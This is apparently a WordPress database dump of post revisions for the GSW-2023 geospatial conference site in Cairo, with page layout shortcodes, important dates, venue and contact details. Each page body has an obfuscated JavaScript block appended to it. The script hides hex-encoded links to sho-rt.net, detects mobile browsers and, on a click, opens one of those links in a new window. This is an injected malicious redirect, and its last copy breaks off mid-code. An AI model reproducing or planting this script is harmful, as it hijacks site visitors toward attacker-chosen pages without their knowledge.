69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-03 04:22:44','2023-02-03 04:22:44','',3066,'https://gsw2023.com/?p=3725',0,'revision','',0),
(3726,1,'2023-02-04 00:05:43','2023-02-04 00:05:43','<p>[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 